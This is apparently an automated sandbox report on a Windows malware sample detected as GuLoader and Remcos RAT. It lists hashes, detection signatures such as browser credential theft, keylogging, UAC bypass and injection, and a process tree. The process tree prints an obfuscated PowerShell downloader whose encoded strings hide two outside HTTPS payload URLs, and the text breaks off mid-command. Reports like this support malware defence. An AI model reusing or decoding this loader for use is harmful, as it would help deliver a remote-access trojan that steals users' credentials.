Edit tour
Windows
Analysis Report
17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Overview
General Information
| Sample name: | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe |
| Analysis ID: | 1483073 |
| MD5: | 3ad8cb387874a15488508bf269fd2520 |
| SHA1: | e083d92b7f1668b105c18ce5772caccc8705b903 |
| SHA256: | 1b97d7dd602a1a105948d1607a6c8bc2014eb752078e35f839b4a5c5095a4e90 |
| Tags: | base64-decodedexe |
| Infos: |   |
 | |
Detection
GuLoader, Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe (PID: 4368 cmdline: "C:\Users\ user\Deskt op\1722001 5066e9475e fc6df52db0 521bbe1501 b782223eb2 8324fcb835 a5fc91b660 9347235811 .dat-decod ed.exe" MD5: 3AD8CB387874A15488508BF269FD2520) 
wscript.exe (PID: 6064 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\Fo rfrelsens. vbs" MD5: FF00E0480075B095948000BDC66E81F0) 
powershell.exe (PID: 2064 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Revisora tets207 Sm aatrykkene forlise S ujet Udvan dringerne Wadies Thi oantimonio us Unparal ysed Whiff er massepr oduceres E ntings Heb enon Zymin Dumpnings skibes Reo btainment Allingeboe ns Zinkkog rafierne C hecksums R everbrate Phare Spis ekkkens Pr ogramredak trs hetero morphous S parkedragt en0 Reviso ratets207 Smaatrykke ne forlise Sujet Udv andringern e Wadies T hioantimon ious Unpar alysed Whi ffer masse produceres Entings H ebenon Zym in Dumpnin gsskibes R eobtainmen t Allingeb oens Zinkk ografierne Checksums Reverbrat e Phare Sp isekkkens Programred aktrs hete romorphous Sparkedra gten0';If (${host}.C urrentCult ure) {$Dig ers++;}Fun ction Svnd yssendes94 ($Dukketea trenes){$U adskilleli gt=$Dukket eatrenes.L ength-$Dig ers;$Mainl ining='SUB sTR';$Main lining+='i ng';For( $ truthsman= 1;$truthsm an -lt $Ua dskillelig t;$truthsm an+=2){$Re visoratets 207+=$Dukk eteatrenes .$Mainlini ng.Invoke( $truthsma n, $Digers );}$Reviso ratets207; }function Scance($St rukturndri ngernes){ . ($Ge deramsen) ($Struktur ndringerne s);}$Ambag es77=Svndy ssendes94 ' MIo zGi lKl,aL/C5F . 0R (.W i Sn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D; S Uxy6 4M; , ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeN f,oHxC/E1 2A1 .U0B ' ;$slotting =Svndyssen des94 '.UT sUe r.-FA g ern,ti ' ;$Udvandri ngerne=Svn dyssendes9 4 ' h tTtj pAsA: /E/K aPs,oDc.i aRt i.a t r.aLd,i tG i.i m aArS i a...r o, /GoLs /,t r aDn.s.p o.rbtEm e, nNt...pAfP mM> hSt t pHs,:P/ /, n.e.w ..qC uPr aLnGu s hbaEi qG e r . oerF g..,s a./ wMpc- a.d m.iKnD/ToN s,e rCvDe /Rtdr,a np s.pro.r.tS m.e n tG. pHfTmI ';$ Fluffs=Svn dyssendes9 4 'S> ';$G ederamsen= Svndyssend es94 'Pi,e x ';$Lgne re='Unpara lysed';$de cos = Svnd yssendes94 'Ee cMh,o S % a p pT daaStSa % \FS n i g m yMr,dJe dPeA. SFkS o. ,& &H F eDc h.oU t ';Scance (Svndyssen des94 ',$ g lHo bOaA lC:PRge.gF r =h( c m, d, /Vc, .$ d.e.cBoBs ,). ');Sca nce (Svndy ssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S $SUTdKvFa, n,dIrDiOn. gSeLr,nSe .HsApGlAi tB( $ FJl. uOfNf.sD)p ');Scance (Svndysse ndes94 ',[ BN e,t .cS eorHvLi.c Ve PSo iNn .tSMcaCn,a ogAeKr,]S: D:OSPePc u Pr.iKt y P DrCoBt o,c Fool I=. C [SNNeLt .. S eBcHu rU i.t yMPMrM o.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E '); $Udvandrin gerne=$Suj et[0];$Res priser= (S vndyssende s94 ',$.gI l.o bRaBlP : Y m c a = N eIw -. OLb jbeMc t, S.yEsCt ,e mH.RNUe StH.mW e.b RCKl i,e.n Mt');$Resp riser+=$Re gr[1];Scan ce ($Respr iser);Scan ce (Svndys sendes94 ' A$ YDm.c,a .UHUeMaPd .e rSsA[ $ FsJlIo tRt ,i nKgP]d= ,$OA,mTbFa Sg e,sK7 7 ');$Genly dens=Svndy ssendes94